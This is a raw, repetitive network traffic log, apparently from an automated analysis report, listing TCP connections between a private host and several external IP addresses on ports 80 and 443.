Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49717 -> 166.62.27.188:80
Source: global traffic	TCP traffic: 192.168.2.5:49733 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49733 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49733 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49807 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49813 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49831 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49813 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49848 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49860 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49873 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49813 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49886 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49904 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49905 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49919 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49932 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49934 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49946 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49960 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49975 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49990 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49795 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49802 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49826 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49843 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49854 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49866 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49871 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49879 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49880 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49887 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49896 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49897 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49912 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49913 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49920 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49926 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49939 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49953 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49967 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49981 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49986 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50001 -> 149.154.167.220:443

Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
